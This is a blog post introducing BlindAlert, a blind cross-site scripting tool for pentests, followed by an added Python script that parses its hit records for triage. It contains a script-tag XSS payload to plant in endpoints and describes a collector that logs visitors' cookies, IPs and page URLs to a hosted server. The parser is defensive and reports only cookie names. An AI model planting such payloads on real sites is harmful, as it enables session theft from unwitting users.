BlindAlert — Blind Cross Site Script tool

Mukesh Dhama
Feb 11, 2018

Blind Cross-Site Scripting takes more effort to find in an application during a pentest. It requires a server on which you host a tool capable of detecting Blind XSS.

BlindAlert is an easy Blind Cross-Site Scripting tool which you can run locally or host on a server.

Requirements

  • PHP >= 5.7
  • Running server or ngrok (access localhost over the internet)

Installation

You can either install it on your local system and access it through ngrok, or install it on a live server.

To install BlindAlert, simply clone the repo:

git clone https://github.com/mdhama/blindAlert.git

To run on a local server

cd blindAlert
php -S localhost:80

Now open http://localhost in your browser.

Over the internet using ngrok

./ngrok http 80

Usage

  • Create a JS payload and start blindly putting it into endpoints :-) e.g. "><script src="http://localhost"></script>
  • When it executes successfully, it creates an output file within the same project directory.

Example output file.txt:

origin: http://example
host: example
url: http://example/user/posts
referrer: http://example/user
user-agent: <user-agent>
cookies: <document.cookie>
ip: <ip_address>
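
Each record in that file is a finding to triage: the url field names the page that rendered the stored input unescaped, and any cookie that shows up was readable by script, which means it was set without HttpOnly. The parser below is an added example and not part of BlindAlert; it assumes one record per hit separated by a blank line, and the sample data and the names parse_records and triage are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

FIELDS = {"origin", "host", "url", "referrer", "user-agent", "cookies", "ip"}

# Constructed sample in the page's "key: value" layout. Assumption: one record
# per hit, separated by a blank line (the tool's real multi-hit layout may differ).
SAMPLE = """\
origin: http://admin.example
host: admin.example
url: http://admin.example/tickets/view?id=7
referrer: http://admin.example/tickets
user-agent: Mozilla/5.0 (constructed)
cookies: PHPSESSID=constructed123; theme=dark
ip: 192.0.2.10

origin: http://example
host: example
url: http://example/user/posts
referrer: http://example/user
user-agent: Mozilla/5.0 (constructed)
cookies:
ip: 192.0.2.44
"""

def parse_records(text):
    """Split the file into records and keep only the known fields."""
    records = []
    for block in re.split(r"\n\s*\n", text.strip()):
        rec = {}
        for line in block.splitlines():
            key, sep, value = line.partition(":")  # split on the first colon only
            if sep and key.strip().lower() in FIELDS:
                rec[key.strip().lower()] = value.strip()
        if rec:
            records.append(rec)
    return records

def triage(rec):
    """Summarise one hit for the report: where it fired and what was exposed."""
    url = urlsplit(rec.get("url", ""))
    pairs = [c.split("=", 1) for c in rec.get("cookies", "").split(";") if "=" in c]
    return {
        "host": rec.get("host", url.hostname or ""),
        "path": url.path or "/",              # page that rendered the stored input
        "plain_http": url.scheme == "http",   # page was served without TLS
        # Names only: values are live session secrets and stay out of the report.
        "script_readable_cookies": [name.strip() for name, _ in pairs],
    }
```

Running triage over every record from parse_records gives one report row per hit; a non-empty script_readable_cookies list is the cue to set HttpOnly on those cookies in addition to fixing the output encoding on the listed path.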
